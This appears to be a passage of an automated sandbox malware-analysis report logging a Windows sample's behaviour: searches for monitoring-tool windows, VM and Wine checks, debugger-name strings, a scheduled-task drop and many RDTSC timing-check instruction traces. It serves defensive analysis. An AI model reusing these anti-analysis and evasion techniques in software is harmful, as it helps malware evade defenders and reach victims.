Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\p199AjsEFs.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAQ.EXEH
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXEZ
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2AE11 second address: B2AE1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2AE1A second address: B2AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA3F4E97196h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B356AF second address: B356B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B356B9 second address: B356C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B35819 second address: B3581D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3581D second address: B3582D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jns 00007FA3F4E97196h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B35B1E second address: B35B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA3F4513F34h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37F36 second address: B37F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37F3A second address: B37FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4513F32h 0x0000000b popad 0x0000000c xor dword ptr [esp], 1C04AB93h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FA3F4513F28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ecx, edi 0x0000002f jmp 00007FA3F4513F32h 0x00000034 push 00000003h 0x00000036 add dword ptr [ebp+122D1DB1h], edx 0x0000003c or cx, 8F67h 0x00000041 push 00000000h 0x00000043 jmp 00007FA3F4513F35h 0x00000048 push 00000003h 0x0000004a add dword ptr [ebp+122D1DB1h], edi 0x00000050 call 00007FA3F4513F29h 0x00000055 jns 00007FA3F4513F2Ch 0x0000005b push eax 0x0000005c pushad 0x0000005d jl 00007FA3F4513F28h 0x00000063 pushad 0x00000064 popad 0x00000065 pushad 0x00000066 jns 00007FA3F4513F26h 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f popad 0x00000070 mov eax, dword ptr [esp+04h] 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 jp 00007FA3F4513F26h 0x0000007d pop eax 0x0000007e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37FEE second address: B37FF8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3F4E9719Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37FF8 second address: B38005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38005 second address: B38009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38009 second address: B3800D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3800D second address: B3801D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3801D second address: B3802C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38151 second address: B38155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3820C second address: B38216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38216 second address: B3825D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 add dword ptr [esp], 2F746AEEh 0x0000000d mov edx, dword ptr [ebp+122D1934h] 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D2968h] 0x0000001b push 00000000h 0x0000001d jmp 00007FA3F4E971A3h 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D1D9Dh], esi 0x0000002a call 00007FA3F4E97199h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3825D second address: B3826B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3826B second address: B38272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38272 second address: B382A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA3F4513F39h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA3F4513F2Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B382A5 second address: B38303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FA3F4E9719Eh 0x00000011 push eax 0x00000012 jmp 00007FA3F4E971A9h 0x00000017 pop eax 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FA3F4E9719Bh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA3F4E971A3h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38303 second address: B38307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38307 second address: B3830D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3830D second address: B38335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D1D45h], ecx 0x00000010 lea ebx, dword ptr [ebp+1244EE2Dh] 0x00000016 movzx esi, bx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38335 second address: B3834F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3834F second address: B3836F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FA3F4513F26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA3F4513F31h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B49D20 second address: B49D26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B57E12 second address: B57E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F37h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B57E2D second address: B57E37 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B57FC5 second address: B57FD9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3F4513F26h 0x00000008 jnl 00007FA3F4513F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583B5 second address: B583BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583BF second address: B583C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583C3 second address: B583C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583C9 second address: B583CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B583CF second address: B583D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B58547 second address: B5854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587B5 second address: B587D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA3F4E971A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587D0 second address: B587D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B587D6 second address: B587E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA3F4E97196h 0x0000000a rdtsc
